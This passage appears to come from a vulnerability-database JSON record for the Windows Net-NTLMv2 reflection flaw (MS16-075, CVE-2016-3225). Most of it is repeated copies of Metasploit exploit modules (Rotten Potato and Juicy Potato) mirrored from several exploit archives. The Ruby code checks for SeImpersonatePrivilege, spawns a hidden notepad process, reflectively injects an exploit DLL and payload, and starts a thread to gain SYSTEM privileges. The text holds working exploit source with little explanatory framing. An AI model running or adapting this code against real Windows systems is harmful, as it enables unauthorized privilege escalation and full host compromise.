'x86'\r\n vprint_status(\"Found we are on an x86 target\")\r\n my_target = targets[1]\r\n when 'x64'\r\n vprint_status(\"Found we are on an x64 target\")\r\n my_target = targets[2]\r\n else\r\n fail_with(Failure::NoTarget, \"Unable to determine target\")\r\n end\r\n else\r\n my_target = target\r\n end\r\n return my_target\r\n end\r\n\r\n def verify_arch(my_target)\r\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\r\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\r\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\r\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\r\n end\r\n if client.arch != sysinfo[\"Architecture\"]\r\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\")\r\n else\r\n vprint_good(\"Current payload and target Arch match....\")\r\n end\r\n end\r\n\r\n def check\r\n privs = client.sys.config.getprivs\r\n if privs.include?('SeImpersonatePrivilege')\r\n return Exploit::CheckCode::Appears\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n my_target = assign_target\r\n print_status(\"#{my_target['Arch']}\")\r\n verify_arch(my_target)\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\r\n end\r\n if my_target.opts['Arch'] == 'x64'\r\n dll_file_name = 'rottenpotato.x64.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\r\n elsif my_target.opts['Arch'] == 'x86'\r\n dll_file_name = 'rottenpotato.x86.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\r\n else\r\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\r\n end\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n print_error('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\nend\n\n# 0day.today [2018-10-06] #", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31263"}], "exploitdb": [{"lastseen": "2018-10-08T18:29:48", "description": "Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit). CVE-2016-3225. Local exploit for Windows platform. Tags: Metasploit Framework (MSF), Local", "published": "2018-10-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2018-10-08T00:00:00", "id": "EDB-ID:45562", "href": "https://www.exploit-db.com/exploits/45562/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\r\n 'Description' => %q(\r\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\r\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\r\n does not spawn as SYSTEM, however once achieving a shell, one can easily\r\n use incognito to impersonate the token.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'FoxGloveSec', # the original Potato exploit\r\n 'breenmachine', # Rotten Potato NG!\r\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\r\n ],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => ['meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'none',\r\n 'WfsDelay' => '20'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows x86', { 'Arch' => ARCH_X86 }],\r\n ['Windows x64', { 'Arch' => ARCH_X64 }]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'References' =>\r\n [\r\n ['MSB', 'MS16-075'],\r\n ['CVE', '2016-3225'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\r\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\r\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\r\n ],\r\n 'DisclosureDate' => 'Jan 16 2016',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def assign_target\r\n if target.name == 'Automatic'\r\n case sysinfo[\"Architecture\"]\r\n when 'x86'\r\n vprint_status(\"Found we are on an x86 target\")\r\n my_target = targets[1]\r\n when 'x64'\r\n vprint_status(\"Found we are on an x64 target\")\r\n my_target = targets[2]\r\n else\r\n fail_with(Failure::NoTarget, \"Unable to determine target\")\r\n end\r\n else\r\n my_target = target\r\n end\r\n return my_target\r\n end\r\n\r\n def verify_arch(my_target)\r\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\r\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\r\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\r\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\r\n end\r\n if client.arch != sysinfo[\"Architecture\"]\r\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\")\r\n else\r\n vprint_good(\"Current payload and target Arch match....\")\r\n end\r\n end\r\n\r\n def check\r\n privs = client.sys.config.getprivs\r\n if privs.include?('SeImpersonatePrivilege')\r\n return Exploit::CheckCode::Appears\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n my_target = assign_target\r\n print_status(\"#{my_target['Arch']}\")\r\n verify_arch(my_target)\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\r\n end\r\n if my_target.opts['Arch'] == 'x64'\r\n dll_file_name = 'rottenpotato.x64.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\r\n elsif my_target.opts['Arch'] == 'x86'\r\n dll_file_name = 'rottenpotato.x86.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\r\n else\r\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\r\n end\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n print_error('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45562/"}], "metasploit": [{"lastseen": "2020-10-07T21:29:36", "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string. Windows 10 after version 1803, (April 2018 update, build 17134) and all versions of Windows Server 2019 are not vulnerable.\n", "published": "2019-01-10T16:20:43", "type": "metasploit", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION_JUICY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info, {\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)',\n 'Description' => %q(\n This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.\n Windows 10 after version 1803, (April 2018 update, build 17134) and all\n versions of Windows Server 2019 are not vulnerable.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'FoxGloveSec', # the original Potato exploit\n 'breenmachine', # Rotten Potato NG!\n 'decoder', # Lonely / Juicy Potato\n 'ohpe', # Juicy Potato\n 'phra', # MSF Module\n 'lupman' # MSF Module\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'none',\n 'WfsDelay' => '20'\n },\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['MSB', 'MS16-075'],\n ['CVE', '2016-3225'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG'],\n ['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'],\n ['URL', 'https://ohpe.it/juicy-potato/']\n ],\n 'DisclosureDate' => '2016-01-16',\n 'DefaultTarget' => 0\n }))\n\n register_options(\n [\n OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])\n ]\n )\n\n register_advanced_options(\n [\n OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]),\n OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]),\n OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),\n OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),\n OptString.new('LogFile', [ false, 'Set the log file' ])\n ]\n )\n end\n\n # Creates a temp notepad.exe to inject payload in to given the payload\n def create_temp_proc\n windir = client.sys.config.getenv('windir')\n # Select path of executable to run depending the architecture\n if sysinfo[\"Architecture\"] == ARCH_X64 && client.arch == ARCH_X86 && @payload_arch.first == ARCH_X64\n cmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\"\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && client.arch == ARCH_X64 && @payload_arch.first == ARCH_X86\n cmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\"\n else\n cmd = \"#{windir}\\\\System32\\\\notepad.exe\"\n end\n begin\n proc = client.sys.process.execute(cmd, nil, { 'Hidden' => true })\n rescue Rex::Post::Meterpreter::RequestError\n return nil\n end\n\n return proc\n end\n\n def create_temp_proc_stage2\n windir = client.sys.config.getenv('windir')\n # Select path of executable to run depending the architecture\n if sysinfo[\"Architecture\"] == ARCH_X64 && @payload_arch.first == ARCH_X86\n cmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\"\n else\n cmd = \"#{windir}\\\\System32\\\\notepad.exe\"\n end\n return cmd\n end\n\n def check\n os = client.sys.config.sysinfo['OS']\n build = os.match(/Build (\\d+)/)\n privs = client.sys.config.getprivs\n # Fast fails\n if !privs.include?('SeImpersonatePrivilege')\n print_bad(\"Target session is missing the SeImpersonatePrivilege.\")\n return Exploit::CheckCode::Safe\n end\n if (os =~ /NT|XP|2003|.NET Server/) || (os =~ /2008/ && os !~ /2008 R2/)\n print_bad(\"Microsoft Windows before Server 2008 R2 are not vulnerable.\")\n return Exploit::CheckCode::Safe\n end\n # Windows 10 after build 17134 (April 2018 update, version 1803) is not\n # vulnerable. Due to changes in OS names, detecting the difference between\n # Server 2016/19 is most reliably done with build numbers:\n # (https://github.com/rapid7/metasploit-payloads/pull/355)\n if build.nil?\n print_warning(\"Could not determine Windows build number - exploiting might fail.\")\n else\n build_number = build[1].to_i\n if build_number > 17134\n print_bad(\"Target appears to be patched (#{os})\")\n return Exploit::CheckCode::Safe\n elsif build_number < 7601\n print_bad(\"Target appears to be too old (#{os})\")\n return Exploit::CheckCode::Safe\n end\n end\n print_good(\"Target appears to be vulnerable (#{os})\")\n return Exploit::CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n @payload_name = datastore['PAYLOAD']\n @payload_arch = framework.payloads.create(@payload_name).arch\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')\n end\n if @payload_arch.first == ARCH_X64\n dll_file_name = 'juicypotato.x64.dll'\n vprint_status(\"Assigning payload juicypotato.x64.dll\")\n elsif @payload_arch.first == ARCH_X86\n dll_file_name = 'juicypotato.x86.dll'\n vprint_status(\"Assigning payload juicypotato.x86.dll\")\n else\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\n end\n print_status('Launching notepad to host the exploit...')\n notepad_process = create_temp_proc\n cmd = create_temp_proc_stage2\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"juicypotato\", dll_file_name)\n library_path = ::File.expand_path(library_path)\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n print_status(\"Exploit injected. Injecting exploit configuration into #{process.pid}...\")\n configuration = \"#{datastore['LogFile']}\\x00\"\n configuration += \"#{cmd}\\x00\"\n configuration += \"#{datastore['CLSID']}\\x00\"\n configuration += \"#{datastore['ListeningPort']}\\x00\"\n configuration += \"#{datastore['RpcServerHost']}\\x00\"\n configuration += \"#{datastore['RpcServerPort']}\\x00\"\n configuration += \"#{datastore['ListeningAddress']}\\x00\"\n configuration += \"#{payload.encoded.length}\\x00\"\n configuration += payload.encoded\n payload_mem = inject_into_process(process, configuration)\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Configuration injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms16_075_reflection_juicy.rb"}, {"lastseen": "2020-10-14T21:43:02", "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.\n", "published": "2018-08-03T06:09:24", "type": "metasploit", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\n 'Description' => %q(\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'FoxGloveSec', # the original Potato exploit\n 'breenmachine', # Rotten Potato NG!\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'none',\n 'WfsDelay' => '20'\n },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows x86', { 'Arch' => ARCH_X86 }],\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['MSB', 'MS16-075'],\n ['CVE', '2016-3225'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\n ],\n 'DisclosureDate' => '2016-01-16',\n 'DefaultTarget' => 0\n }))\n end\n\n def assign_target\n if target.name == 'Automatic'\n case sysinfo[\"Architecture\"]\n when 'x86'\n vprint_status(\"Found we are on an x86 target\")\n my_target = targets[1]\n when 'x64'\n vprint_status(\"Found we are on an x64 target\")\n my_target = targets[2]\n else\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n end\n else\n my_target = target\n end\n return my_target\n end\n\n def verify_arch(my_target)\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\n end\n if client.arch != sysinfo[\"Architecture\"]\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\")\n else\n vprint_good(\"Current payload and target Arch match....\")\n end\n end\n\n def check\n privs = client.sys.config.getprivs\n if privs.include?('SeImpersonatePrivilege')\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n my_target = assign_target\n print_status(\"#{my_target['Arch']}\")\n verify_arch(my_target)\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\n end\n if my_target.opts['Arch'] == 'x64'\n dll_file_name = 'rottenpotato.x64.dll'\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\n elsif my_target.opts['Arch'] == 'x86'\n dll_file_name = 'rottenpotato.x86.dll'\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\n else\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\n end\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\n library_path = ::File.expand_path(library_path)\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms16_075_reflection.rb"}], "packetstorm": [{"lastseen": "2019-01-16T18:50:49", "description": "", "published": "2019-01-16T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Net-NTLMv2 Reflection DCOM/RPC Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2019-01-16T00:00:00", "id": "PACKETSTORM:151182", "href": "https://packetstormsecurity.com/files/151182/Microsoft-Windows-Net-NTLMv2-Reflection-DCOM-RPC-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/windows/reflective_dll_injection' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)', \n'Description' => %q( \nThis module utilizes the Net-NTLMv2 reflection between DCOM/RPC \nto achieve a SYSTEM handle for elevation of privilege. \nIt requires a CLSID string. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'FoxGloveSec', # the original Potato exploit \n'breenmachine', # Rotten Potato NG! \n'decoder', # Lonely / Juicy Potato \n'ohpe', # Juicy Potato \n'phra', # MSF Module \n'lupman' # MSF Module \n], \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'none', \n'WfsDelay' => '20' \n}, \n'Targets' => \n[ \n['Automatic', {}] \n#['Windows x86', { 'Arch' => ARCH_X86 }], \n#['Windows x64', { 'Arch' => ARCH_X64 }] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n['MSB', 'MS16-075'], \n['CVE', '2016-3225'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], \n['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], \n['URL', 'https://github.com/breenmachine/RottenPotatoNG'], \n['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'], \n['URL', 'https://ohpe.it/juicy-potato/'] \n], \n'DisclosureDate' => 'Jan 16 2016', \n'DefaultTarget' => 0 \n})) \n \nregister_options( \n[ \nOptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]) \n]) \n \nregister_advanced_options( \n[ \nOptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]), \nOptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]), \nOptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]), \nOptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]), \nOptString.new('LogFile', [ false, 'Set the log file' ]) \n]) \nend \n \ndef assign_target \nif target.name == 'Automatic' \ncase sysinfo[\"Architecture\"] \nwhen 'x86' \nvprint_status(\"Found we are on an x86 target\") \nmy_target = targets[1] \nwhen 'x64' \nvprint_status(\"Found we are on an x64 target\") \nmy_target = targets[2] \nelse \nfail_with(Failure::NoTarget, \"Unable to determine target\") \nend \nelse \nmy_target = target \nend \nreturn my_target \nend \n \n# Creates a temp notepad.exe to inject payload in to given the payload \ndef create_temp_proc() \nwindir = client.sys.config.getenv('windir') \n# Select path of executable to run depending the architecture \nif sysinfo[\"Architecture\"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64 \ncmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\" \nelsif sysinfo[\"Architecture\"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86 \ncmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\" \nelse \ncmd = \"#{windir}\\\\System32\\\\notepad.exe\" \nend \nbegin \nproc = client.sys.process.execute(cmd, nil, {'Hidden' => true}) \nrescue Rex::Post::Meterpreter::RequestError \nreturn nil \nend \n \nreturn proc \nend \n \ndef create_temp_proc_stage2() \nwindir = client.sys.config.getenv('windir') \n# Select path of executable to run depending the architecture \nif sysinfo[\"Architecture\"] == ARCH_X64 and @payload_arch.first == ARCH_X86 \ncmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\" \nelse \ncmd = \"#{windir}\\\\System32\\\\notepad.exe\" \nend \nreturn cmd \nend \n \ndef check \nprivs = client.sys.config.getprivs \nwin10build = client.sys.config.sysinfo['OS'].match /Windows 10 \\(Build (\\d+)\\)/ \nif win10build and win10build[1] > '17134' \nreturn Exploit::CheckCode::Safe \nend \nwin2019build = client.sys.config.sysinfo['OS'].match /Windows 2019 \\(Build (\\d+)\\)/ \nif win2019build and win2019build[1] > '17134' \nreturn Exploit::CheckCode::Safe \nend \nif privs.include?('SeImpersonatePrivilege') \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n@payload_name = datastore['PAYLOAD'] \n@payload_arch = framework.payloads.create(@payload_name).arch \nmy_target = assign_target \nif check == Exploit::CheckCode::Safe \nfail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege') \nend \nif @payload_arch.first == ARCH_X64 \ndll_file_name = 'juicypotato.x64.dll' \nvprint_status(\"Assigning payload juicypotato.x64.dll\") \nelsif @payload_arch.first == ARCH_X86 \ndll_file_name = 'juicypotato.x86.dll' \nvprint_status(\"Assigning payload juicypotato.x86.dll\") \nelse \nfail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\") \nend \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = create_temp_proc \ncmd = create_temp_proc_stage2 \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"juicypotato\", dll_file_name) \nlibrary_path = ::File.expand_path(library_path) \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \nprint_status(\"Exploit injected. Injecting exploit configuration into #{process.pid}...\") \nconfiguration = \"#{datastore['LogFile']}\\x00\" \nconfiguration += \"#{cmd}\\x00\" \nconfiguration += \"#{datastore['CLSID']}\\x00\" \nconfiguration += \"#{datastore['ListeningPort']}\\x00\" \nconfiguration += \"#{datastore['RpcServerHost']}\\x00\" \nconfiguration += \"#{datastore['RpcServerPort']}\\x00\" \nconfiguration += \"#{datastore['ListeningAddress']}\\x00\" \nconfiguration += \"#{payload.encoded.length}\\x00\" \nconfiguration += payload.encoded \npayload_mem = inject_into_process(process, configuration) \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on 